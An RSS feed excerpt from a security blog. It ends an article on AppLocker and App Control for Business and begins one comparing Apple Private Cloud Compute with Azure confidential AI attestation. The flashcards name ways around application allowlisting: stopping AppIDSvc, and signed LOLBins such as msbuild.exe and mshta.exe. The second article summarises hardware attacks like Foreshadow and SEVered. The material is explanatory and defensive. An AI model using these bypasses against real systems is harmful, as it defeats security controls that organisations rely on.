  { term: &quot;App Control for Business (WDAC)&quot;, definition: &quot;Kernel CI-policy mechanism in ci.dll; same code path as 2015 Configurable CI and 2017 WDAC; MSRC security feature when signed and HVCI on.&quot; },
  { term: &quot;AppIDSvc&quot;, definition: &quot;User-mode Windows service that evaluates AppLocker rules; stopping it removes AppLocker enforcement.&quot; },
  { term: &quot;ci.dll&quot;, definition: &quot;Windows kernel Code Integrity component; enforces driver signing, KMCS, DSE, and App Control policy as peers.&quot; },
  { term: &quot;Intelligent Security Graph (ISG)&quot;, definition: &quot;Microsoft cloud reputation classifier returning known good / known bad / unknown; ISG-enabled App Control treats known good as an additive allow signal.&quot; },
  { term: &quot;HVCI&quot;, definition: &quot;Hypervisor-protected Code Integrity (memory integrity); runs the ci.dll evaluator in VTL1 so a VTL0 attacker cannot tamper with the verdict.&quot; },
  { term: &quot;Managed Installer&quot;, definition: &quot;App Control trust-propagation feature in which files written by a designated installer process are EA-tagged as trusted; implemented as an AppLocker rule collection.&quot; },
  { term: &quot;Recommended Block Rules&quot;, definition: &quot;Microsoft-curated list of approximately forty signed binaries that can bypass an allow-Microsoft-signed App Control policy; the inverse list that makes App Control coherent.&quot; },
  { term: &quot;LOLBin&quot;, definition: &quot;Living Off The Land Binary; a vendor-signed binary an attacker repurposes to run arbitrary code under a policy that admits the publisher.&quot; },
  { term: &quot;Smart App Control&quot;, definition: &quot;Consumer-grade Windows 11 application-control feature; unmanaged, all-or-nothing, ISG-gated; same ci.dll evaluator as App Control for Business.&quot; }
]} flashcards={[
  { front: &quot;What does Microsoft say about AppLocker and the MSRC servicing criteria?&quot;, back: &quot;AppLocker &apos;doesn&apos;t meet the servicing criteria for being a security feature&apos; -- it is operational hygiene, not a security boundary.&quot; },
  { front: &quot;Where does the AppLocker policy decision actually happen?&quot;, back: &quot;In user mode, in the AppIDSvc service. The kernel minifilter AppID.sys defers the verdict to AppIDSvc, which means a SYSTEM attacker can stop the service and end enforcement.&quot; },
  { front: &quot;Who signs an App Control signed policy?&quot;, back: &quot;The deploying organisation -- not the application publisher. The policy&apos;s .cip file is signed by an internal PKI leaf so a SYSTEM attacker cannot replace it.&quot; },
  { front: &quot;What does ISG return?&quot;, back: &quot;A reputation classification: known good, known bad, or unknown. ISG is not a list; it is a cloud classifier processed on a 24-hour cycle.&quot; },
  { front: &quot;Why are the Recommended Block Rules load-bearing?&quot;, back: &quot;Without them, &apos;allow Microsoft-signed code&apos; admits cdb.exe, csi.exe, dnx.exe, msbuild.exe, mshta.exe, dotnet.exe and the rest of the LOLBin catalogue; App Control with vs without them are qualitatively different products.&quot; },
  { front: &quot;What is the structural ceiling of any publisher-gate allowlist?&quot;, back: &quot;The evaluator runs before the binary starts; it knows what the binary IS but not what it will DO. The publisher gate cannot evaluate side effects.&quot; }
]} questions={[
  { q: &quot;Why is AppLocker not deprecated, even though Microsoft Learn says it is not a security feature?&quot;, a: &quot;Because AppLocker&apos;s per-user policy capability has no replacement in App Control for Business, and AppLocker continues to receive security fixes (e.g., KB5044288 in October 2024). It is not on the Windows deprecated-features page as of February 2026.&quot; },
  { q: &quot;Under what specific configuration does App Control for Business meet the MSRC servicing criteria as a security boundary?&quot;, a: &quot;Signed policy, signed by the deploying organisation&apos;s PKI leaf; HVCI enabled so the evaluator runs in VTL1; Microsoft Recommended Block Rules merged into the active policy; Vulnerable Driver Blocklist enabled.&quot; },
  { q: &quot;Why does Microsoft publish a list of its own bypassable signed binaries?&quot;, a: &quot;Because the publisher gate (the allow signal in App Control) cannot evaluate the side effects of a signed binary at policy-evaluation time. Microsoft&apos;s response to the LOLBin research class was institutional -- publish and continuously update the inverse list -- rather than architectural.&quot; },
  { q: &quot;Why do the Mermaid diagrams in section 6 separate the VTL0 normal kernel from the VTL1 secure kernel?&quot;, a: &quot;Because HVCI moves the code-integrity evaluator into VTL1, behind the hypervisor boundary. A kernel-mode attacker confined to VTL0 cannot tamper with the verdict; this is the architectural reason a signed App Control policy + HVCI is the MSRC security-boundary configuration.&quot; },
  { q: &quot;When would a 2026 deployment use AppLocker and App Control for Business on the same device?&quot;, a: &quot;When the device needs per-user policy on some collections (e.g., terminal-server users in different roles) and a real security boundary on others (kernel CI policy with signed policy and HVCI on). The two systems coexist by design; they are non-substitutable.&quot; }
]} /&amp;gt;&lt;/p&gt;
&lt;p&gt;The thesis was the article&apos;s first sentence: two locks on the same door, two threat models, not redundancy. AppLocker is operational hygiene, the user-mode evaluator Microsoft itself declines to call a security feature. App Control for Business -- with a signed policy, HVCI on, and the Recommended Block Rules merged in -- is the MSRC security boundary. Both ship in Windows 11 24H2 and Server 2025 because neither is a strict superset of the other, and the practitioner gets to choose, per deployment, which lock the door needs. For deeper treatment of the cryptographic plumbing, see the companion Authenticode article; for the HVCI / VTL story, see the companion WDAC + HVCI article; for the BYOVD residual in section 13, see the companion Driver Signing article. The line between &lt;em&gt;security feature&lt;/em&gt; and &lt;em&gt;operational hygiene control&lt;/em&gt; is sharp in Microsoft&apos;s own words -- and the two products defending that line will both keep shipping until the line itself moves.&lt;/p&gt;
</content:encoded><category>windows-security</category><category>applocker</category><category>wdac</category><category>app-control</category><category>code-integrity</category><category>allowlisting</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Verify Me, Don&apos;t Trust Me: Apple PCC, Azure Confidential AI, and the Architecture of the Modern AI Cloud</title><link>https://paragmali.com/blog/verify-me-dont-trust-me-apple-pcc-azure-confidential-ai-and-/</link><guid isPermaLink="true">https://paragmali.com/blog/verify-me-dont-trust-me-apple-pcc-azure-confidential-ai-and-/</guid><description>Apple Private Cloud Compute and Azure confidential AI ship the same promise through unrecognisably different machinery. On five axes they differ in degree. On one axis -- verifiable transparency of the production fleet -- they differ in kind.</description><pubDate>Mon, 01 Jun 2026 00:00:00 GMT</pubDate><content:encoded>
Apple and Microsoft now ship the same user-facing promise -- &quot;the cloud cannot see your AI prompt&quot; -- through completely different machinery. Apple&apos;s **Private Cloud Compute** (announced June 10, 2024 [@apple-pcc-blog]; source release October 24, 2024 [@apple-pcc-research]) runs custom Apple-Silicon servers with a per-node Secure Enclave Processor and publishes every production image hash to a public, append-only **Transparency Log** that the user&apos;s device cryptographically refuses to bypass. Microsoft&apos;s Azure confidential AI substrate (`NCCads_H100_v5`, GA September 24, 2024 [@ms-h100-ga]) composes AMD SEV-SNP confidential VMs with NVIDIA H100 GPUs in CC-On mode, verifies the composed attestation through Microsoft Azure Attestation, and gates customer-managed keys through Secure Key Release from Azure Key Vault. On five of six architectural axes the two designs differ in *degree*. On the sixth -- verifiable transparency of the production fleet -- they differ in *kind*.
&lt;h2&gt;1. Same Promise, Opposite Architectures&lt;/h2&gt;
&lt;p&gt;On June 10, 2024, Apple announced Private Cloud Compute and promised that &quot;personal user data sent to PCC isn&apos;t accessible to anyone other than the user -- not even to Apple&quot; [@apple-pcc-blog]. On September 24, 2024, Microsoft brought its first confidential GPU SKU to general availability. NVIDIA&apos;s companion blog called Azure &quot;the first cloud provider to offer confidential computing with NVIDIA H100 GPUs&quot; [@nvidia-h100-ga]. Microsoft&apos;s coordinated Trustworthy AI post framed the same architectural commitment: Microsoft itself cannot view or tamper with the data or the model inference process [@ms-h100-ga] [@ms-trustworthy-ai]. Two vendors. The same user-facing contract. Five months apart.&lt;/p&gt;
&lt;p&gt;Open the lid on either one and the machinery is unrecognisable.&lt;/p&gt;
&lt;p&gt;Apple PCC runs on custom Apple-Silicon servers, each with a &lt;a href=&quot;https://paragmali.com/blog/apple-secure-enclave-vs-microsoft-pluton-two-roads-to-hardwa/&quot; rel=&quot;noopener&quot;&gt;Secure Enclave Processor&lt;/a&gt; wired into a vendor-controlled certificate chain. Every production node image hash is published to an append-only public log that the user&apos;s device cryptographically refuses to bypass [@apple-pcc-blog] [@apple-pcc-release-transparency].&lt;/p&gt;
&lt;p&gt;Azure&apos;s confidential-AI substrate runs on the &lt;code&gt;Standard_NCC40ads_H100_v5&lt;/code&gt; SKU: 40 non-multithreaded 4th-Gen AMD EPYC Genoa vCPUs, 320 GiB of RAM, one NVIDIA H100 NVL GPU with 94 GB of high-bandwidth memory, with the Trusted Execution Environment &quot;spanning confidential VM on the CPU and attached GPU&quot; [@ms-sku-nccads]. Trust is rooted in AMD&apos;s per-chip signing key, Intel&apos;s TDX module on the alternative SKU family, NVIDIA&apos;s on-die hardware root of trust on the GPU, and a Microsoft-operated verifier service called Microsoft Azure Attestation [@ms-maa-overview]. None of those signers are Apple, and Apple&apos;s signer is none of them.&lt;/p&gt;
&lt;p&gt;That is not a difference of brand preference. It is a difference about &lt;em&gt;who you are trusting and how you can check&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;This article is a side-by-side architectural treatment of the two designs. It will compare them on six axes you will be able to recite at the end:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Silicon control&lt;/strong&gt; -- who controls the chip, the firmware, the OS, and the inference runtime.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hardware root of trust&lt;/strong&gt; -- which signing keys anchor the attestation chain.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Attestation surface&lt;/strong&gt; -- what cryptographic artefact the relying party actually consumes.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Key release and state model&lt;/strong&gt; -- whether the customer holds keys, and how those keys are released to the workload.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;GPU TEE&lt;/strong&gt; -- how confidential compute extends from the CPU into the GPU.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Network anonymization&lt;/strong&gt; -- whether the operator can correlate requests with their originating client.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;By the end you should be able to read a Microsoft Azure Attestation JSON Web Token and an Apple PCC attestation envelope at the same level of fluency, and explain to a non-specialist what each cryptographic artefact actually proves. You should be able to name the threat each architecture defends against, and the threats neither closes by construction.&lt;/p&gt;
&lt;p&gt;When the user-facing promise is the same, the architectural divergence is the entire story. To understand what that divergence means, we first have to see where each architecture came from. The two designs did not converge on the same problem by coincidence. They descended from two different ancestor problems that took until 2024 to meet.&lt;/p&gt;
&lt;h2&gt;2. Confidential Computing&apos;s Two Parents&lt;/h2&gt;
&lt;p&gt;September 14, 2017. Mark Russinovich, Azure CTO, publishes &quot;Introducing Azure confidential computing.&quot; Microsoft, he writes, is &quot;the first cloud to offer new data security capabilities with a collection of features and services called Azure confidential computing,&quot; and the point of the announcement is &quot;encryption of data while in use&quot; [@ms-russinovich-2017]. Russinovich names &quot;data in use&quot; as the third protection state, the missing companion to &quot;at rest&quot; and &quot;in transit.&quot; Five years later the Confidential Computing Consortium publishes &quot;A Technical Analysis of Confidential Computing&quot; v1.3, the vendor-neutral document both Apple and Microsoft now anchor on, which defines the field formally and gives the lower bounds explicitly [@ccc-technical-analysis] [@ccc-about].&lt;/p&gt;
&lt;p&gt;Russinovich&apos;s framing did not appear from nowhere. It was the cloud-operator-side voice of a conversation that had two parents in the underlying hardware.&lt;/p&gt;
&lt;h3&gt;Parent one: the hardware TEE lineage&lt;/h3&gt;
&lt;p&gt;A &lt;strong&gt;Trusted Execution Environment&lt;/strong&gt; is a hardware-isolated execution context inside a system whose own host operating system or hypervisor is &lt;em&gt;not&lt;/em&gt; trusted to look in. The lineage starts in the early 2000s with ARM TrustZone&apos;s split-world NS-bit, then Intel TXT (Trusted Execution Technology) for measured launch on the CPU side -- originally announced as &lt;strong&gt;LaGrande Technology&lt;/strong&gt; at IDF 2003 and rebranded as TXT around 2007 with the vPro / Q35-Q45 chipset rollout. Apple shipped its first &lt;strong&gt;Secure Enclave Processor&lt;/strong&gt; -- a separate Apple-designed processor core on the same SoC as the main application processor, with its own boot ROM, AES engine, and protected memory -- on the iPhone 5s in September 2013 [@apple-sep-guide].&lt;/p&gt;

A hardware-isolated execution context inside a larger system in which code can run with cryptographic guarantees of confidentiality and integrity even when the system&apos;s own operating system, hypervisor, or peripheral firmware is compromised or controlled by an adversary. TEEs include process-scope enclaves (Intel SGX), VM-scope confidential VMs (AMD SEV-SNP, Intel TDX), and on-die separate-processor designs (Apple Secure Enclave Processor, Microsoft Pluton).
&lt;p&gt;Intel SGX (Software Guard Extensions) arrived as the first widely-available general-purpose TEE on commodity x86 silicon, with the architectural model first described in the McKeen et al. HASP 2013 paper [@mckeen-sgx-hasp] and given general availability on Skylake-era Core CPUs in late 2015. Costan and Devadas&apos;s &quot;Intel SGX Explained&quot; (IACR ePrint 2016/086) became the canonical academic systematization [@costan-sgx]. SGX let an application author carve out an &lt;em&gt;enclave&lt;/em&gt; -- a slice of address space encrypted in DRAM by a per-CPU memory-encryption engine and measured at creation time -- and have a remote party verify, through an Intel-signed attestation report, that a specific code measurement was running before any secret was released to it.&lt;/p&gt;

Per the Confidential Computing Consortium: protection of data in use through computation in a hardware-based, attested Trusted Execution Environment. The CCC explicitly extends the protection state-pair (at rest, in transit) with a third state (in use) and treats hardware TEEs as the substrate that makes the third state cryptographically enforceable. The CCC v1.3 analysis is the vendor-neutral definitional document both Apple and Microsoft cite [@ccc-technical-analysis] [@ms-cc-overview].
&lt;h3&gt;Parent two: the cloud-operator-as-adversary lineage&lt;/h3&gt;
&lt;p&gt;The other parent was the cloud. Once enterprise workloads moved into public clouds, the &lt;em&gt;cloud operator itself&lt;/em&gt; became part of the threat model. AMD &lt;strong&gt;published the first SEV API specification&lt;/strong&gt; (&quot;Secure Encrypted Virtualization&quot;) in April 2016, with silicon support shipping in the EPYC 7001 &quot;Naples&quot; family in June 2017 -- attaching a per-VM memory-encryption key to AMD EPYC processors. SEV-ES followed in February 2017, adding encrypted register state on world switches. &lt;strong&gt;SEV-SNP&lt;/strong&gt; (Secure Nested Paging), described in an AMD whitepaper in January 2020 [@amd-sev-snp-wp], added integrity protection through the Reverse Map Table. Intel&apos;s parallel response was &lt;strong&gt;TDX&lt;/strong&gt; (Trust Domain Extensions), specified in September 2020.&lt;/p&gt;
&lt;p&gt;Both AMD and Intel framed the contribution the same way: protect the guest from a hypervisor that may itself be the adversary. That framing was exactly what Russinovich&apos;s 2017 post had been pointing at, three years earlier, on the cloud side [@ms-russinovich-2017].&lt;/p&gt;
&lt;h3&gt;Convergence&lt;/h3&gt;
&lt;p&gt;The two parents started speaking a common vocabulary in the early 2020s. The Confidential Computing Consortium was founded in August 2019 as a Linux Foundation project community, with members across CPU vendors (AMD, Intel, NVIDIA, ARM), cloud providers (Microsoft, Google, Oracle), and OS / runtime vendors (Red Hat, Canonical, IBM) [@ccc-about].&lt;/p&gt;
&lt;p&gt;In January 2023 the IETF Remote ATtestation procedureS (RATS) Working Group published RFC 9334, &quot;Remote ATtestation procedureS (RATS) Architecture,&quot; giving the field a single vocabulary for the four roles in any attestation flow: the &lt;strong&gt;Attester&lt;/strong&gt; (the workload making the claim), the &lt;strong&gt;Verifier&lt;/strong&gt; (the party that checks the cryptographic evidence), the &lt;strong&gt;Relying Party&lt;/strong&gt; (the party that makes a decision based on the verified result), and the &lt;strong&gt;Endorser&lt;/strong&gt; (the party that vouches for the Attester&apos;s identity, typically the silicon vendor) [@ietf-rfc9334].&lt;/p&gt;
&lt;p&gt;Both Apple PCC and Microsoft Azure Attestation map cleanly onto RFC 9334&apos;s vocabulary. They use the same words for the same roles. The architectures that fill those roles are different.&lt;/p&gt;

timeline
    title TEE and confidential-computing milestones (2003-2024)
    section Hardware TEE lineage
        2003 : ARM TrustZone (mobile split-world)
        2007 : Intel TXT / LaGrande (measured launch)
        2013 : Apple Secure Enclave on iPhone 5s
        2015 : Intel SGX general availability (Skylake)
        2016 : Costan and Devadas SGX Explained
    section Cloud operator as adversary
        2016 : AMD SEV (memory encryption)
        2017 : AMD SEV-ES (encrypted register state)
        2017 : Azure CC introduced (Russinovich)
        2020 : AMD SEV-SNP whitepaper (integrity via RMP)
        2020 : Intel TDX specification
    section Vocabulary and standards
        2019 : Confidential Computing Consortium founded
        2022 : CCC Technical Analysis v1.3
        2023 : IETF RFC 9334 RATS Architecture
        2024 : Apple PCC and Azure H100 CC-On GA
&lt;p&gt;Apple&apos;s lineage is a third tributary the other two largely overlook. The iPhone Data Protection model, anchored in the SEP since 2013, and iCloud Private Relay&apos;s two-hop architecture from 2021 onward both fed into PCC. PCC is the only major-vendor confidential-AI substrate descended from a &lt;em&gt;device-side&lt;/em&gt; TEE origin rather than a &lt;em&gt;cloud-side&lt;/em&gt; one [@apple-sep-guide] [@apple-pcc-blog].&lt;/p&gt;
&lt;p&gt;Both parents converged on the same vocabulary by 2023. But the first attempts at putting that vocabulary into production hit walls neither parent had predicted -- starting with the 128 MB enclave that broke deep learning before it began.&lt;/p&gt;
&lt;h2&gt;3. Process Enclaves and the Operator-Honesty Assumption&lt;/h2&gt;
&lt;p&gt;August 2018, USENIX Security. Jo Van Bulck and nine co-authors publish &quot;Foreshadow: Extracting the Keys to the Intel SGX Kingdom with Transient Out-of-Order Execution&quot; [@foreshadow]. The attack reads L1-cached enclave memory transiently and -- this is the load-bearing detail -- recovers the SGX EPID attestation-signing key for the targeted CPU generation. Once an attestation key leaks, every attestation that platform produces is forgeable to the attacker until microcode is updated and the EPID group is revoked. The whole &quot;the enclave really is what it says it is&quot; property collapses for that CPU generation overnight.&lt;/p&gt;
&lt;p&gt;To understand what Foreshadow was attacking, it helps to walk SGX&apos;s enclave lifecycle. A privileged-mode application invokes &lt;code&gt;ECREATE&lt;/code&gt; to reserve an enclave address range; pages are added with &lt;code&gt;EADD&lt;/code&gt;, each call measuring the page contents into a SHA-256 chain that becomes the enclave&apos;s &lt;code&gt;MRENCLAVE&lt;/code&gt; measurement; &lt;code&gt;EINIT&lt;/code&gt; finalises the chain and locks the enclave; &lt;code&gt;EENTER&lt;/code&gt; is then the only legal entry point [@mckeen-sgx-hasp] [@costan-sgx]. When a remote party asks the enclave to prove its identity, the Quoting Enclave -- a small Intel-signed enclave on every SGX-enabled CPU -- signs a &lt;code&gt;REPORT&lt;/code&gt; structure with the EPID key. The remote party verifies the EPID signature against the Intel Attestation Service and learns &lt;em&gt;which&lt;/em&gt; code measurement the enclave is running.&lt;/p&gt;

sequenceDiagram
    participant App as Untrusted app
    participant CPU as SGX hardware
    participant QE as Quoting Enclave
    participant IAS as Intel Attestation Service
    participant RP as Relying Party
    App-&amp;gt;&amp;gt;CPU: ECREATE (reserve enclave)
    App-&amp;gt;&amp;gt;CPU: EADD pages (measured into MRENCLAVE)
    App-&amp;gt;&amp;gt;CPU: EINIT (finalise measurement)
    App-&amp;gt;&amp;gt;CPU: EENTER (transfer control)
    CPU-&amp;gt;&amp;gt;QE: produce local REPORT
    QE-&amp;gt;&amp;gt;IAS: sign REPORT with EPID key
    IAS-&amp;gt;&amp;gt;RP: verify quote, return result
    RP-&amp;gt;&amp;gt;App: release secret if measurement matches

A dedicated secure subsystem integrated into Apple Silicon, isolated from the main application processor with its own boot ROM, AES Engine, and protected memory. The SEP runs an L4-derived microkernel and was first shipped on the iPhone 5s in 2013. It is not a TPM, not the NFC Secure Element used for Apple Pay, and not architecturally related to Intel SGX. It is the per-node hardware root of trust on every Apple Private Cloud Compute server [@apple-sep-guide] [@apple-pcc-blog].
&lt;p&gt;SGX scaled to a billion CPUs in three or four years, but it never scaled to deep learning. Three killer constraints stopped it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Constraint one: the Enclave Page Cache ceiling.&lt;/strong&gt; On Skylake-class client and Xeon E-2100 / E-2200 (Coffee Lake-based) server SKUs the Enclave Page Cache (EPC) was capped at 128 MB total per socket, of which only ~96 MB was usable for application data after Intel&apos;s bookkeeping overhead. An order of magnitude too small for any modern deep-learning workload, where a single set of weights for even a small model could easily exceed the EPC by a factor of 100 or more. (Skylake-SP and Cascade Lake-SP server Xeons did not ship SGX at all; SGX at server scale only arrived with Ice Lake-SP in 2021, by which point the cloud-AI story had moved past process-scope enclaves.)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Constraint two: the programming model.&lt;/strong&gt; SGX required the application author to split the codebase into a trusted (in-enclave) and untrusted (outside-enclave) half, with explicit &lt;code&gt;ECALL&lt;/code&gt; and &lt;code&gt;OCALL&lt;/code&gt; transitions and a fixed serialised data interface across the trust boundary. Production codebases written before SGX existed simply refused to be partitioned that way. The handful of teams that tried -- mainly Intel internal proof-of-concepts -- produced systems that worked but did not generalise.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Constraint three: the side-channel cascade.&lt;/strong&gt; Foreshadow / L1TF in August 2018 [@foreshadow]; SgxPectre at IEEE EuroS&amp;amp;P 2019, demonstrating Spectre-v1-style transient-execution attacks inside SGX enclaves [@sgxpectre]; Plundervolt in IEEE S&amp;amp;P 2020, a software-based fault-injection attack via Intel&apos;s privileged voltage-control interface, assigned CVE-2019-11157 [@plundervolt]. Each closed a different residual surface that Intel&apos;s threat model had not named. The principled extension -- that any TEE on shared silicon inherits a microarchitectural side-channel surface that the architectural threat model does not cover -- became the field&apos;s unspoken second axiom.&lt;/p&gt;
&lt;p&gt;SGX&apos;s attestation chain itself went through a generational turnover. The original EPID (Enhanced Privacy ID) scheme tied attestation verification to the Intel Attestation Service as a centralised relying party. By 2018 Intel had begun the transition to DCAP (Data Center Attestation Primitives), letting cloud operators host their own attestation infrastructure. The transition was exactly because EPID-pinned-to-IAS was incompatible with how cloud providers wanted to verify attestations at fleet scale.&lt;/p&gt;
&lt;p&gt;AMD&apos;s first-generation SEV and SEV-ES belong to the same era. They encrypted guest memory and (in SEV-ES) the saved register state on world switches, but they did not yet have the integrity check that would make a malicious hypervisor architecturally unable to mount remap-style attacks. That defence had to wait for SEV-SNP and a different failure that demonstrated, on the other side of the trust boundary, exactly the same lesson Foreshadow had taught on the Intel side.&lt;/p&gt;
&lt;p&gt;Process-scope enclaves were the wrong granularity. The fix had to come from somewhere else. What if you encrypted whole virtual machines instead?&lt;/p&gt;
&lt;h2&gt;4. Three Architectural Waves That Made Cloud Confidential AI Feasible&lt;/h2&gt;
&lt;p&gt;WOOT 2018. Mathias Morbitzer, Manuel Huber, Julian Horsch, and Sascha Wessel publish &quot;SEVered: Subverting AMD&apos;s Virtual Machine Encryption&quot; [@severed]. A malicious hypervisor remaps a guest&apos;s network-facing service to point at &lt;em&gt;other&lt;/em&gt; guest physical pages; the service unwittingly serves the contents of those pages -- still inside the guest, still nominally encrypted at the memory controller -- as plaintext over the network. The encryption did not break. The attack did not need it to.&lt;/p&gt;
&lt;p&gt;This is the architectural insight every Generation-3-and-later confidential VM design is built on.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Confidentiality without integrity is not isolation. A confidential VM that encrypts memory but does not bind the encryption to a specific physical page can be tricked into encrypting and then leaking other guests&apos; contents on the operator&apos;s behalf. Every TEE design from 2020 onward is haunted by the SEVered failure.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Wave 1 (~2020-2022): VM-level TEEs with hardware-enforced page ownership&lt;/h3&gt;
&lt;p&gt;AMD&apos;s response was SEV-SNP and the &lt;strong&gt;Reverse Map Table (RMP)&lt;/strong&gt;: one entry per 4 KB physical page in the system, tracking ownership, validation state, and the permitted size class for that page. Guest pages transition from &lt;code&gt;INVALID&lt;/code&gt; to &lt;code&gt;VALIDATED&lt;/code&gt; only via a guest-initiated &lt;code&gt;PVALIDATE&lt;/code&gt; instruction; subsequent hypervisor remap attempts that would violate the RMP fault out at the hardware level. Intel TDX took a parallel architectural path: a new privilege ring below the hypervisor called &lt;strong&gt;SEAM&lt;/strong&gt; mode, running the Intel-signed TDX Module, with per-VM trust-domain encryption keys managed through MK-TME (Multi-Key Total Memory Encryption).&lt;/p&gt;

A hardware-managed table maintained by AMD SEV-SNP processors with one entry per 4 KB physical page in the system. Each entry records the page&apos;s owner (which guest, if any), its validation state (`VALIDATED` or not), and the permitted size class. The hypervisor cannot remap a guest-owned page into a different guest without triggering a fault. The RMP is AMD&apos;s architectural response to SEVered: it makes the SEVered class of attacks impossible by construction.
&lt;p&gt;Azure brought the SEV-SNP substrate to general availability in 2022 with &lt;a href=&quot;https://paragmali.com/blog/inside-azure-confidential-vms-sev-snp-intel-tdx-and-the-para/&quot; rel=&quot;noopener&quot;&gt;the &lt;code&gt;DCasv5&lt;/code&gt; and &lt;code&gt;ECasv5&lt;/code&gt; confidential VM families&lt;/a&gt; (the &lt;code&gt;a&lt;/code&gt; denotes AMD silicon, the &lt;code&gt;s&lt;/code&gt; denotes premium storage) [@ms-cc-overview]. Intel TDX entered public preview on Azure in December 2023. Full general availability of the next-generation Intel TDX confidential VMs on 5th-Gen Intel Xeon Scalable Emerald Rapids -- the &lt;code&gt;DCesv6&lt;/code&gt;, &lt;code&gt;DCedsv6&lt;/code&gt;, &lt;code&gt;ECesv6&lt;/code&gt;, and &lt;code&gt;ECedsv6&lt;/code&gt; families -- followed on February 26, 2026 [@ms-tdx-v6-ga] [@ms-dcesv6].&lt;/p&gt;
&lt;p&gt;The earlier SEV and SEV-ES generations were not free of side channels either. Li, Zhang, Wang, Li, and Cheng&apos;s &quot;CipherLeaks&quot; (USENIX Security 2021) showed a deterministic-ciphertext side channel against SEV-ES: identical plaintext at the same physical address produced identical ciphertext, letting a hypervisor observe constant-time cryptographic implementations and recover keys without ever breaking the encryption [@cipherleaks]. SEV-SNP&apos;s tweakable ciphertext mode addressed this, but the architectural lesson -- that &quot;the encryption is intact&quot; is not the same as &quot;the operator learns nothing&quot; -- repeats.&lt;/p&gt;
&lt;h3&gt;Wave 2 (~2022-2024): Attestation and key release as managed services&lt;/h3&gt;
&lt;p&gt;The second wave was less spectacular but more consequential for procurement. &lt;strong&gt;Microsoft Azure Attestation&lt;/strong&gt; (MAA) is a managed verifier that consumes SEV-SNP attestation reports, TDX quotes, SGX quotes, VBS enclave reports, &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;vTPM&lt;/a&gt; event logs, and Trusted Launch evidence and issues a JSON Web Token (JWT) with documented &lt;code&gt;x-ms-isolation-tee&lt;/code&gt;, &lt;code&gt;x-ms-compliance-status&lt;/code&gt;, &lt;code&gt;x-ms-sevsnpvm-*&lt;/code&gt;, and &lt;code&gt;x-ms-runtime&lt;/code&gt; claims [@ms-maa-overview]. Per the MAA overview verbatim: &quot;Azure Attestation supports both platform- and guest-attestation of AMD SEV-SNP based Confidential VMs (CVMs)&quot; [@ms-maa-overview]. The JWT can then drive &lt;strong&gt;Secure Key Release&lt;/strong&gt; from Azure Key Vault Premium or Azure Managed HSM: the encrypted customer key carries a &lt;em&gt;release policy&lt;/em&gt; against MAA-issued claims, and the HSM unwraps the key only when the policy is satisfied [@ms-cc-overview].&lt;/p&gt;

A managed Microsoft cloud service that acts as the Verifier (in the IETF RFC 9334 sense) for confidential workloads on Azure. MAA consumes hardware-vendor attestation evidence (SGX quotes, SEV-SNP attestation reports, Intel TDX quotes, vTPM event logs) and produces a signed JSON Web Token whose `x-ms-*` claims describe the attested TEE state. The JWT is the artefact that downstream relying parties -- including Azure Key Vault&apos;s Secure Key Release flow -- consume to decide whether to release a secret to the workload [@ms-maa-overview].

An Azure Key Vault Premium and Azure Managed HSM capability that gates release of a wrapped key on a successful attestation. The customer attaches a *release policy* to the key at creation time; the policy is evaluated against the claims of an MAA-issued JWT presented at unwrap time. The key is released to the workload only when the MAA token&apos;s claims match the policy. SKR makes customer-managed key material a first-class architectural primitive for Azure confidential workloads [@ms-cc-overview] [@ms-maa-overview].
&lt;p&gt;This is the implementation of what RFC 9334 calls the &lt;strong&gt;Passport&lt;/strong&gt; topological pattern: the Attester collects evidence once, hands it to the Verifier, gets back an Attestation Result (the MAA JWT), and then carries that Result to any Relying Party (the HSM, an external policy engine, an audit log) for the rest of the session [@ietf-rfc9334].&lt;/p&gt;

The MAA-as-managed-service shift removed a substantial per-customer engineering burden: customers no longer have to write their own attestation-report parsers, certificate-chain validators, or revocation-list checkers. This is the practical reason confidential VMs moved from research artefact to procurement category in 2022-2024. The trade-off it carries is structural: MAA itself becomes a trust anchor. If MAA&apos;s signing infrastructure or its policy-evaluation code is compromised, every relying party that consumes a MAA JWT is exposed in the same breath. The verifier is now a control point.
&lt;h3&gt;Wave 3 (June-October 2024): GPU TEEs, vendor-controlled fleets, and the public arrival of confidential AI&lt;/h3&gt;
&lt;p&gt;The third wave landed in five months in 2024 and changed what &quot;confidential AI&quot; could mean in production.&lt;/p&gt;
&lt;p&gt;The NVIDIA Hopper H100 confidential-computing whitepaper (WP-11459-001) had landed in July 2023 [@nvidia-whitepaper], and the NVIDIA Developer Blog technical post that accompanied it described the architecture in detail: an on-die hardware root of trust, secure measured boot of the GPU firmware, an SPDM (Security Protocol and Data Model) session connecting the CPU TEE driver to the GPU with mutual authentication, and encrypted bounce-buffer data movement between CPU encrypted memory and GPU encrypted HBM [@nvidia-dev-blog]. The blog states the architectural fact verbatim: &quot;The NVIDIA H100 Tensor Core GPU is the first ever GPU to introduce support for confidential computing&quot; [@nvidia-dev-blog].&lt;/p&gt;
&lt;p&gt;Apple announced Private Cloud Compute on June 10, 2024 at WWDC, with the canonical primary titled &quot;Private Cloud Compute: A new frontier for AI privacy in the cloud&quot; [@apple-pcc-blog]. Microsoft Build 2024 (May 21, 2024) announced confidential inferencing not for GPT-4 but for the Azure OpenAI &lt;strong&gt;Whisper&lt;/strong&gt; speech-to-text model [@ms-workshop-whisper].&lt;/p&gt;
